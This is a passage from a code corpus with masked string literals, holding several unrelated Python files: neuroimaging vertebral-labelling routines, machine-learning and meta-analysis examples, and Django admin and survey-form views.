data_disc_template == current_disc ) [ <NUM_LIT:2> ] ) <EOL> except TypeError : <EOL> printv ( '<STR_LIT>' , verbose , '<STR_LIT>' ) <EOL> break <EOL> pattern = data_template [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z_template - size_IS : current_z_template + size_IS + <NUM_LIT:1> ] <EOL> pattern1d = pattern . ravel ( ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) <EOL> plt . scatter ( yc + shift_AP , current_z , c = '<STR_LIT>' , s = <NUM_LIT:50> ) <EOL> range_z = range ( - <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> I_corr = np . zeros ( len ( range_z ) ) <EOL> allzeros = <NUM_LIT:0> <EOL> ind_I = <NUM_LIT:0> <EOL> for iz in range_z : <EOL> if current_z + iz + size_IS > nz : <EOL> padding_size = current_z + iz + size_IS <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> - padding_size ] <EOL> data_chunk3d = np . pad ( data_chunk3d , ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , padding_size ) ) , '<STR_LIT>' , constant_values = <NUM_LIT:0> ) <EOL> elif current_z - iz - size_IS < <NUM_LIT:0> : <EOL> padding_size = abs ( current_z - iz - size_IS ) <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z - iz - size_IS + padding_size : current_z - iz + size_IS + <NUM_LIT:1> ] <EOL> data_chunk3d = np . pad ( data_chunk3d , ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( padding_size , <NUM_LIT:0> ) ) , '<STR_LIT>' , constant_values = <NUM_LIT:0> ) <EOL> else : <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> data_chunk1d = data_chunk3d . ravel ( ) <EOL> if ( data_chunk1d . size == pattern1d . size ) and np . any ( data_chunk1d ) : <EOL> I_corr [ ind_I ] = calc_MI ( data_chunk1d , pattern1d , <NUM_LIT:32> ) <EOL> else : <EOL> allzeros = <NUM_LIT:1> <EOL> ind_I = ind_I + <NUM_LIT:1> <EOL> if allzeros : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> I_corr_adj = I_corr <EOL> if np . any ( I_corr_adj ) : <EOL> ind_peak = [ i for i in range ( len ( I_corr_adj ) ) if I_corr_adj [ i ] == max ( I_corr_adj ) ] [ <NUM_LIT:0> ] <EOL> printv ( '<STR_LIT>' + str ( ind_peak ) + '<STR_LIT>' + str ( I_corr_adj [ ind_peak ] ) + '<STR_LIT:)>' , verbose ) <EOL> if I_corr_adj [ ind_peak ] < thr_corr : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> ind_peak = range_z . index ( <NUM_LIT:0> ) <EOL> else : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> ind_peak = range_z . index ( <NUM_LIT:0> ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_pattern , figsize = ( <NUM_LIT:20> , <NUM_LIT:7> ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . imshow ( np . flipud ( np . mean ( pattern [ : , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) ) , origin = '<STR_LIT>' , cmap = plt . cm . gray , interpolation = '<STR_LIT:none>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> iz = <NUM_LIT:0> <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> plt . imshow ( np . flipud ( np . mean ( data_chunk3d [ : , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) ) , origin = '<STR_LIT>' , cmap = plt . cm . gray , interpolation = '<STR_LIT:none>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> iz = range_z [ ind_peak ] <EOL> data_chunk3d = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP : yc + shift_AP + size_AP + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> plt . imshow ( np . flipud ( np . mean ( data_chunk3d [ : , : , : ] , axis = <NUM_LIT:0> ) . transpose ( ) ) , origin = '<STR_LIT>' , cmap = plt . cm . gray , interpolation = '<STR_LIT:none>' ) <EOL> plt . title ( '<STR_LIT>' + str ( iz ) ) <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( I_corr_adj ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . plot ( ind_peak , I_corr_adj [ ind_peak ] , '<STR_LIT>' ) , plt . draw ( ) <EOL> plt . axvline ( x = range_z . index ( <NUM_LIT:0> ) , linewidth = <NUM_LIT:1> , color = '<STR_LIT>' , linestyle = '<STR_LIT>' ) <EOL> plt . axhline ( y = thr_corr , linewidth = <NUM_LIT:1> , color = '<STR_LIT:r>' , linestyle = '<STR_LIT>' ) <EOL> plt . figure ( fig_pattern ) , plt . savefig ( '<STR_LIT>' + str ( current_disc ) + '<STR_LIT>' ) , plt . close ( ) <EOL> current_z = current_z + range_z [ ind_peak ] <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) , plt . scatter ( yc + shift_AP , current_z , c = '<STR_LIT>' , s = <NUM_LIT:50> ) <EOL> plt . text ( yc + shift_AP + <NUM_LIT:4> , current_z , str ( current_disc ) + '<STR_LIT:/>' + str ( current_disc + <NUM_LIT:1> ) , verticalalignment = '<STR_LIT>' , horizontalalignment = '<STR_LIT:left>' , color = '<STR_LIT>' , fontsize = <NUM_LIT:15> ) , plt . draw ( ) <EOL> if direction == '<STR_LIT>' : <EOL> list_disc_z . insert ( <NUM_LIT:0> , current_z ) <EOL> list_disc_value . insert ( <NUM_LIT:0> , current_disc ) <EOL> elif direction == '<STR_LIT>' : <EOL> list_disc_z . append ( current_z ) <EOL> list_disc_value . append ( current_disc ) <EOL> if len ( list_disc_z ) > <NUM_LIT:1> : <EOL> list_distance_current = ( np . diff ( list_disc_z ) * ( - <NUM_LIT:1> ) ) . tolist ( ) <EOL> index_disc_identified = [ i for i , j in enumerate ( list_disc_value_template ) if j in list_disc_value [ : - <NUM_LIT:1> ] ] <EOL> list_distance_template_identified = [ list_distance_template [ i ] for i in index_disc_identified ] <EOL> list_subject_to_template_distance = [ float ( list_distance_current [ i ] ) / list_distance_template_identified [ i ] for i in range ( len ( list_distance_current ) ) ] <EOL> correcting_factor = np . mean ( list_subject_to_template_distance ) <EOL> printv ( '<STR_LIT>' + str ( correcting_factor ) , verbose ) <EOL> else : <EOL> correcting_factor = <NUM_LIT:1> <EOL> list_distance = [ int ( round ( list_distance_template [ i ] * correcting_factor ) ) for i in range ( len ( list_distance_template ) ) ] <EOL> if direction == '<STR_LIT>' : <EOL> try : <EOL> approx_distance_to_next_disc = list_distance [ list_disc_value_template . index ( current_disc - <NUM_LIT:1> ) ] <EOL> except ValueError : <EOL> printv ( '<STR_LIT>' + str ( approx_distance_to_next_disc ) ) <EOL> current_z = current_z + approx_distance_to_next_disc <EOL> current_disc = current_disc - <NUM_LIT:1> <EOL> elif direction == '<STR_LIT>' : <EOL> try : <EOL> approx_distance_to_next_disc = list_distance [ list_disc_value_template . index ( current_disc ) ] <EOL> except : <EOL> printv ( '<STR_LIT>' + str ( approx_distance_to_next_disc ) ) <EOL> current_z = current_z - approx_distance_to_next_disc <EOL> current_disc = current_disc + <NUM_LIT:1> <EOL> if current_z >= nz or current_disc == <NUM_LIT:1> : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> direction = '<STR_LIT>' <EOL> current_disc = init_disc [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> current_z = init_disc [ <NUM_LIT:0> ] - list_distance [ list_disc_value_template . index ( current_disc ) ] <EOL> if current_z <= <NUM_LIT:0> : <EOL> search_next_disc = False <EOL> upper_disc = min ( list_disc_value ) <EOL> if not upper_disc == <NUM_LIT:1> : <EOL> printv ( '<STR_LIT>' + str ( upper_disc - <NUM_LIT:1> ) , verbose ) <EOL> approx_distance_to_next_disc = list_distance [ list_disc_value_template . index ( upper_disc - <NUM_LIT:1> ) ] <EOL> next_z = max ( list_disc_z ) + approx_distance_to_next_disc <EOL> printv ( '<STR_LIT>' + str ( approx_distance_to_next_disc ) , verbose ) <EOL> if next_z > nz : <EOL> list_disc_z . insert ( <NUM_LIT:0> , nz ) <EOL> else : <EOL> list_disc_z . insert ( <NUM_LIT:0> , next_z ) <EOL> list_disc_value . insert ( <NUM_LIT:0> , upper_disc - <NUM_LIT:1> ) <EOL> seg = Image ( fname_seg ) <EOL> for iz in range ( nz ) : <EOL> try : <EOL> ind_above_iz = max ( [ i for i in range ( len ( list_disc_z ) ) if list_disc_z [ i ] > iz ] ) <EOL> except ValueError : <EOL> vertebral_level = <NUM_LIT:0> <EOL> else : <EOL> vertebral_level = list_disc_value [ ind_above_iz ] + <NUM_LIT:1> <EOL> ind_nonzero = np . nonzero ( seg . data [ : , : , iz ] ) <EOL> seg . data [ ind_nonzero [ <NUM_LIT:0> ] , ind_nonzero [ <NUM_LIT:1> ] , iz ] = vertebral_level <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) <EOL> plt . scatter ( int ( round ( ny / <NUM_LIT:2> ) ) , iz , c = vertebral_level , vmin = min ( list_disc_value ) , vmax = max ( list_disc_value ) , cmap = '<STR_LIT>' , marker = '<STR_LIT:_>' , s = <NUM_LIT:200> ) <EOL> seg . file_name += '<STR_LIT>' <EOL> seg . save ( ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_anat_straight ) , plt . savefig ( '<STR_LIT>' ) <EOL> plt . close ( ) <EOL> def create_label_z ( fname_seg , z , value ) : <EOL> """<STR_LIT>""" <EOL> fname_label = '<STR_LIT>' <EOL> nii = Image ( fname_seg ) <EOL> orientation_origin = nii . change_orientation ( '<STR_LIT>' ) <EOL> nx , ny , nz , nt , px , py , pz , pt = nii . dim <EOL> from scipy . ndimage . measurements import center_of_mass <EOL> x , y = center_of_mass ( nii . data [ : , : , z ] ) <EOL> x , y = int ( round ( x ) ) , int ( round ( y ) ) <EOL> nii . data [ : , : , : ] = <NUM_LIT:0> <EOL> nii . data [ x , y , z ] = value <EOL> from sct_maths import dilate <EOL> nii . data = dilate ( nii . data , <NUM_LIT:3> ) <EOL> nii . setFileName ( fname_label ) <EOL> nii . change_orientation ( orientation_origin ) <EOL> nii . save ( ) <EOL> return fname_label <EOL> def get_z_and_disc_values_from_label ( fname_label ) : <EOL> """<STR_LIT>""" <EOL> nii = Image ( fname_label ) <EOL> from scipy . ndimage . measurements import center_of_mass <EOL> x_label , y_label , z_label = center_of_mass ( nii . data ) <EOL> x_label , y_label , z_label = int ( round ( x_label ) ) , int ( round ( y_label ) ) , int ( round ( z_label ) ) <EOL> value_label = int ( nii . data [ x_label , y_label , z_label ] ) <EOL> return [ z_label , value_label ] <EOL> def local_adjustment ( xc , yc , current_z , current_disc , data , size_RL , shift_AP , size_IS , searching_window_for_maximum , verbose ) : <EOL> """<STR_LIT>""" <EOL> if verbose == <NUM_LIT:2> : <EOL> import matplotlib . pyplot as plt <EOL> size_AP_mirror = <NUM_LIT:1> <EOL> searching_window = range ( - <NUM_LIT:9> , <NUM_LIT> ) <EOL> fig_local_adjustment = <NUM_LIT:4> <EOL> thr_corr = <NUM_LIT> <EOL> gaussian_std_factor = <NUM_LIT:3> <EOL> pattern = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP_mirror : yc + shift_AP + size_AP_mirror + <NUM_LIT:1> , current_z - size_IS : current_z + size_IS + <NUM_LIT:1> ] <EOL> if not pattern . shape == ( int ( round ( size_RL * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_AP_mirror * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_IS * <NUM_LIT:2> + <NUM_LIT:1> ) ) ) : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> return current_z <EOL> pattern1d = pattern . ravel ( ) <EOL> I_corr = np . zeros ( ( len ( searching_window ) ) ) <EOL> ind_I = <NUM_LIT:0> <EOL> for iz in searching_window : <EOL> pattern_shift = data [ xc - size_RL : xc + size_RL + <NUM_LIT:1> , yc + shift_AP - size_AP_mirror : yc + shift_AP + size_AP_mirror + <NUM_LIT:1> , current_z + iz - size_IS : current_z + iz + size_IS + <NUM_LIT:1> ] <EOL> if not pattern_shift . shape == ( int ( round ( size_RL * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_AP_mirror * <NUM_LIT:2> + <NUM_LIT:1> ) ) , int ( round ( size_IS * <NUM_LIT:2> + <NUM_LIT:1> ) ) ) : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> return current_z <EOL> pattern1d_shift = pattern_shift . ravel ( ) <EOL> pattern1d_shift_mirr = pattern1d_shift [ : : - <NUM_LIT:1> ] <EOL> I_corr [ ind_I ] = np . corrcoef ( pattern1d_shift_mirr , pattern1d ) [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> ind_I = ind_I + <NUM_LIT:1> <EOL> gaussian_window = gaussian ( len ( searching_window ) , std = len ( searching_window ) / gaussian_std_factor ) <EOL> I_corr_adj = np . multiply ( I_corr , gaussian_window ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_local_adjustment ) , plt . plot ( I_corr ) , plt . plot ( I_corr_adj , '<STR_LIT:k>' ) <EOL> plt . legend ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> ind_peak = argrelextrema ( I_corr_adj , np . greater , order = searching_window_for_maximum ) [ <NUM_LIT:0> ] <EOL> if len ( ind_peak ) == <NUM_LIT:0> : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> adjusted_z = current_z <EOL> else : <EOL> ind_peak = ind_peak [ np . argmax ( I_corr_adj [ ind_peak ] ) ] <EOL> printv ( '<STR_LIT>' + str ( ind_peak ) + '<STR_LIT>' + str ( I_corr_adj [ ind_peak ] ) + '<STR_LIT:)>' , verbose ) <EOL> if I_corr_adj [ ind_peak ] < thr_corr : <EOL> printv ( '<STR_LIT>' , verbose ) <EOL> adjusted_z = current_z <EOL> else : <EOL> adjusted_z = int ( current_z + round ( searching_window [ ind_peak ] / <NUM_LIT:2> ) ) + <NUM_LIT:1> <EOL> printv ( '<STR_LIT>' + str ( adjusted_z ) , verbose ) <EOL> if verbose == <NUM_LIT:2> : <EOL> plt . figure ( fig_local_adjustment ) , plt . plot ( ind_peak , I_corr_adj [ ind_peak ] , '<STR_LIT>' ) <EOL> plt . figure ( fig_local_adjustment ) , plt . savefig ( '<STR_LIT>' + str ( current_disc ) + '<STR_LIT>' ) , plt . close ( ) <EOL> return adjusted_z <EOL> def clean_labeled_segmentation ( fname_labeled_seg , fname_seg , fname_labeled_seg_new ) : <EOL> """<STR_LIT>""" <EOL> run ( '<STR_LIT>' + fname_labeled_seg + '<STR_LIT>' + fname_seg + '<STR_LIT>' ) <EOL> run ( '<STR_LIT>' + fname_labeled_seg + '<STR_LIT>' ) <EOL> data_label_dilate = Image ( '<STR_LIT>' ) . data <EOL> run ( '<STR_LIT>' ) <EOL> data_label_bin = Image ( '<STR_LIT>' ) . data <EOL> data_seg = Image ( fname_seg ) . data <EOL> data_diff = data_seg - data_label_bin <EOL> ind_nonzero = np . where ( data_diff ) <EOL> im_label = Image ( '<STR_LIT>' ) <EOL> for i_vox in range ( len ( ind_nonzero [ <NUM_LIT:0> ] ) ) : <EOL> ix , iy , iz = ind_nonzero [ <NUM_LIT:0> ] [ i_vox ] , ind_nonzero [ <NUM_LIT:1> ] [ i_vox ] , ind_nonzero [ <NUM_LIT:2> ] [ i_vox ] <EOL> im_label . data [ ix , iy , iz ] = data_label_dilate [ ix , iy , iz ] <EOL> im_label . setFileName ( fname_labeled_seg_new ) <EOL> im_label . save ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import sct_utils as sct <EOL> import commands <EOL> def test ( path_data ) : <EOL> folder_data = '<STR_LIT>' <EOL> file_data = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> cmd = '<STR_LIT>' + path_data + folder_data + file_data [ <NUM_LIT:0> ] + '<STR_LIT>' + path_data + folder_data + file_data [ <NUM_LIT:1> ] + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' <EOL> return commands . getstatusoutput ( cmd ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import parsimony . datasets as datasets <EOL> import parsimony . functions . nesterov . tv as nesterov_tv <EOL> import parsimony . estimators as estimators <EOL> import parsimony . utils as utils <EOL> from parsimony . utils . penalties import l1_max_logistic_loss <EOL> from sklearn . metrics import precision_recall_fscore_support <EOL> from sklearn . linear_model import LogisticRegression <EOL> n_samples = <NUM_LIT> <EOL> shape = ( <NUM_LIT:50> , <NUM_LIT:50> , <NUM_LIT:1> ) <EOL> X3d , y , beta3d , proba = datasets . classification . dice5 . load ( n_samples = n_samples , <EOL> shape = shape , snr = <NUM_LIT:10> , random_seed = <NUM_LIT:1> ) <EOL> X = X3d . reshape ( ( n_samples , np . prod ( beta3d . shape ) ) ) <EOL> n_train = <NUM_LIT> <EOL> Xtr = X [ : n_train , : ] <EOL> ytr = y [ : n_train ] <EOL> Xte = X [ n_train : , : ] <EOL> yte = y [ n_train : ] <EOL> alpha = l1_max_logistic_loss ( Xtr , ytr ) <EOL> ridge_sklrn = LogisticRegression ( C = <NUM_LIT:1.> / ( alpha * n_train ) , fit_intercept = False ) <EOL> yte_pred_ridge = ridge_sklrn . fit ( Xtr , ytr . ravel ( ) ) . predict ( Xte ) <EOL> _ , recall_ridge_sklrn , _ , _ = precision_recall_fscore_support ( yte , yte_pred_ridge , average = None ) <EOL> ridge_prsmy = estimators . RidgeLogisticRegression ( alpha ) <EOL> yte_pred_ridge_prsmy = ridge_prsmy . fit ( Xtr , ytr ) . predict ( Xte ) <EOL> _ , recall_ridge_prsmy , _ , _ = precision_recall_fscore_support ( yte , yte_pred_ridge_prsmy , average = None ) <EOL> l1 , l2 , tv = alpha * np . array ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> A = nesterov_tv . linear_operator_from_shape ( beta3d . shape ) <EOL> enettv = estimators . LogisticRegressionL1L2TV ( l1 , l2 , tv , A , algorithm_params = dict ( eps = <NUM_LIT> ) ) <EOL> yte_pred_enettv = enettv . fit ( Xtr , ytr ) . predict ( Xte ) <EOL> _ , recall_enettv , _ , _ = precision_recall_fscore_support ( yte , yte_pred_enettv , average = None ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> limits = None <EOL> utils . plot_map2d ( beta3d . reshape ( shape ) , plot , title = "<STR_LIT>" ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> utils . plot_map2d ( enettv . beta . reshape ( shape ) , plot , limits = limits , <EOL> title = "<STR_LIT>" % tuple ( recall_enettv ) ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> utils . plot_map2d ( ridge_sklrn . coef_ . reshape ( shape ) , plot , limits = limits , <EOL> title = "<STR_LIT>" % tuple ( recall_ridge_sklrn ) ) <EOL> plot = plt . subplot ( <NUM_LIT> ) <EOL> utils . plot_map2d ( ridge_prsmy . beta . reshape ( shape ) , plot , limits = limits , <EOL> title = "<STR_LIT>" % tuple ( recall_ridge_prsmy ) ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> def check_arrays ( * arrays ) : <EOL> """<STR_LIT>""" <EOL> if len ( arrays ) == <NUM_LIT:0> : <EOL> return None <EOL> n_samples = None <EOL> checked_arrays = [ ] <EOL> for array in arrays : <EOL> array = np . asarray ( array , dtype = np . float ) <EOL> if n_samples is None : <EOL> n_samples = array . shape [ <NUM_LIT:0> ] <EOL> if array . shape [ <NUM_LIT:0> ] != n_samples : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( array . shape [ <NUM_LIT:0> ] , n_samples ) ) <EOL> if len ( array . shape ) == <NUM_LIT:1> : <EOL> array = array [ : , np . newaxis ] <EOL> checked_arrays . append ( array ) <EOL> return checked_arrays [ <NUM_LIT:0> ] if len ( checked_arrays ) == <NUM_LIT:1> else checked_arrays <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import doctest <EOL> doctest . testmod ( ) </s>
<s> from neurosynth . base . dataset import Dataset <EOL> from neurosynth . analysis import meta <EOL> import os <EOL> dataset = Dataset ( '<STR_LIT>' ) <EOL> dataset . add_features ( '<STR_LIT>' ) <EOL> print dataset . get_feature_names ( ) <EOL> ids = dataset . get_ids_by_features ( '<STR_LIT>' , threshold = <NUM_LIT> ) <EOL> print len ( ids ) <EOL> ma = meta . MetaAnalysis ( dataset , ids ) <EOL> ma . save_results ( '<STR_LIT>' ) </s>
<s> from django . contrib import admin <EOL> from tastypie . models import ApiAccess <EOL> from django . contrib . gis . admin import OSMGeoAdmin <EOL> from boundaryservice . models import BoundarySet , Boundary <EOL> class ApiAccessAdmin ( admin . ModelAdmin ) : <EOL> pass <EOL> admin . site . register ( ApiAccess , ApiAccessAdmin ) <EOL> class BoundarySetAdmin ( admin . ModelAdmin ) : <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> admin . site . register ( BoundarySet , BoundarySetAdmin ) <EOL> class BoundaryAdmin ( OSMGeoAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> list_display_links = ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> admin . site . register ( Boundary , BoundaryAdmin ) </s>
<s> from operator import eq <EOL> import json <EOL> import random <EOL> import datetime <EOL> from collections import OrderedDict <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . http import HttpResponse , HttpResponseRedirect , Http404 <EOL> from django . shortcuts import render , redirect , get_object_or_404 <EOL> from django . contrib import auth <EOL> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . mail import send_mail <EOL> from django . template . defaultfilters import slugify <EOL> from bakery . views import BuildableDetailView <EOL> from ratelimit . decorators import ratelimit <EOL> from checkup . models import Survey , Assignment , Question , Answer , Comment <EOL> from checkup . models import Choice , QuestionGroupOrder , Respondent , FormRequest <EOL> from checkup . models import QuestionGroup <EOL> from checkup . forms import SurveyForm <EOL> NO_RESPONSE = "<STR_LIT>" <EOL> base_template = settings . TEMPLATE_BASE if hasattr ( settings , '<STR_LIT>' ) else "<STR_LIT>" <EOL> @ ratelimit ( rate = '<STR_LIT>' , method = None , block = True ) <EOL> def surveyform ( request , assignment_id ) : <EOL> assignment = get_object_or_404 ( Assignment , form_slug = assignment_id ) <EOL> request_key = str ( assignment . id ) + str ( hex ( random . randint ( <NUM_LIT> , <NUM_LIT> ) ) ) <EOL> ip_address = request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) or request . META . get ( '<STR_LIT>' ) <EOL> referer = request . META . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> user_agent = request . META . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> try : <EOL> form_request = FormRequest . objects . create ( key = request_key , assignment = assignment , <EOL> ip_address = ip_address , referer = referer , <EOL> user_agent = user_agent ) <EOL> except : <EOL> form_request = FormRequest . objects . create ( key = request_key , assignment = assignment , <EOL> ip_address = '<STR_LIT>' , referer = '<STR_LIT>' , <EOL> user_agent = '<STR_LIT>' ) <EOL> form_request . save ( ) <EOL> complete_check = ( list ( assignment . questions . questions . all ( ) . order_by ( '<STR_LIT:id>' ) . values_list ( '<STR_LIT:id>' , flat = True ) ) <EOL> == list ( assignment . answers . all ( ) . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) ) <EOL> and Comment . objects . filter ( assignment = assignment ) . exists ( ) ) <EOL> if complete_check : <EOL> return HttpResponseRedirect ( '<STR_LIT>' + assignment . form_slug + '<STR_LIT:/>' ) <EOL> else : <EOL> Answer . objects . filter ( assignment = assignment ) . delete ( ) <EOL> Comment . objects . filter ( assignment = assignment ) . delete ( ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = SurveyForm ( request . POST , assignment = assignment ) <EOL> if form . is_valid ( ) : <EOL> for key , value in form . cleaned_data . items ( ) : <EOL> if '<STR_LIT>' in key : <EOL> question = Question . objects . get ( pk = int ( key . split ( '<STR_LIT:->' ) [ <NUM_LIT:1> ] ) ) <EOL> group = assignment . questions <EOL> group_order = QuestionGroupOrder . objects . get ( <EOL> question = question , group = group ) <EOL> answer = Answer . objects . get_or_create ( assignment = assignment , <EOL> question = group_order , <EOL> answer = Choice . objects . get ( pk = int ( value ) ) ) <EOL> elif '<STR_LIT>' in key : <EOL> comment = Comment . objects . get_or_create ( assignment = assignment , <EOL> comment = value ) <EOL> complete_check = ( list ( assignment . questions . questions . all ( ) . order_by ( '<STR_LIT:id>' ) . values_list ( '<STR_LIT:id>' , flat = True ) ) <EOL> == list ( assignment . answers . all ( ) . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) ) <EOL> and Comment . objects . filter ( assignment = assignment ) . exists ( ) ) <EOL> if complete_check : <EOL> assignment . survey_complete = True <EOL> assignment . save ( ) <EOL> email_message = assignment . respondent . first_name + '<STR_LIT:U+0020>' + assignment . respondent . last_name <EOL> email_message += '<STR_LIT>' + assignment . survey . name + '<STR_LIT>' <EOL> email_message += '<STR_LIT>' <EOL> for answer in assignment . answers . all ( ) : <EOL> email_message += answer . question . question . question + '<STR_LIT:\n>' <EOL> email_message += answer . answer . choice + '<STR_LIT:\n>' <EOL> email_message += '<STR_LIT:\n>' <EOL> email_message += '<STR_LIT>' <EOL> email_message += assignment . comment . comment + '<STR_LIT:\n>' <EOL> try : <EOL> send_mail ( '<STR_LIT>' , <EOL> email_message , <EOL> settings . DEFAULT_FROM_EMAIL , <EOL> [ assignment . reporter . user . email ] , <EOL> fail_silently = True ) <EOL> except AttributeError : <EOL> pass <EOL> return HttpResponseRedirect ( '<STR_LIT>' + assignment . form_slug + '<STR_LIT:/>' ) <EOL> else : <EOL> form = SurveyForm ( assignment = assignment ) <EOL> context = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : assignment , <EOL> '<STR_LIT>' : base_template <EOL> } <EOL> return render ( request , '<STR_LIT>' , context ) <EOL> def thanks ( request , assignment_id ) : <EOL> assignment = get_object_or_404 ( Assignment , form_slug = assignment_id ) <EOL> context = { <EOL> '<STR_LIT>' : assignment , <EOL> '<STR_LIT>' : base_template <EOL> } <EOL> return render ( request , '<STR_LIT>' , context ) <EOL> def survey_feed ( request , slug ) : <EOL> survey = get_object_or_404 ( Survey , home_slug = slug ) <EOL> survey_values = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> data = Survey . objects . filter ( pk = survey . id ) . values ( * survey_values ) [ <NUM_LIT:0> ] <EOL> data [ '<STR_LIT>' ] = survey . first_assignment ( ) . get_absolute_url ( ) <EOL> assignments = OrderedDict ( ) <EOL> for assignment in survey . assignments . all ( ) : <EOL> new_assign = { } <EOL> new_assign_values = [ '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ; <EOL> new_assign = Assignment . objects . filter ( pk = assignment . id ) . values ( * new_assign_values ) [ <NUM_LIT:0> ] <EOL> new_assign [ '<STR_LIT:url>' ] = assignment . get_absolute_url ( ) ; <EOL> new_assign [ '<STR_LIT>' ] = True if ( hasattr ( assignment , '<STR_LIT>' ) and assignment . comment . comment != '<STR_LIT>' ) else False <EOL> qas = { } <EOL> for q in assignment . questions . questions . all ( ) : <EOL> if Answer . objects . filter ( assignment = assignment , question__question = q ) . exists ( ) : <EOL> a = Answer . objects . get ( assignment = assignment , question__question = q ) <EOL> qas [ '<STR_LIT:%s>' % q . question ] = a . answer . choice <EOL> else : <EOL> qas [ '<STR_LIT:%s>' % q . question ] = NO_RESPONSE <EOL> new_assign [ '<STR_LIT>' ] = qas <EOL> assignments [ '<STR_LIT>' % ( str ( assignment . respondent . title . order ) . zfill ( <NUM_LIT:3> ) , str ( assignment . id ) . zfill ( <NUM_LIT:3> ) ) ] = new_assign <EOL> data [ '<STR_LIT>' ] = assignments <EOL> data = json . dumps ( data , sort_keys = False , indent = <NUM_LIT:4> ) <EOL> return HttpResponse ( data , mimetype = '<STR_LIT:application/json>' ) <EOL> def overview_feed ( request , slug ) : <EOL> '''<STR_LIT>''' <EOL> survey = get_object_or_404 ( Survey , home_slug = slug ) <EOL> survey_values = [ 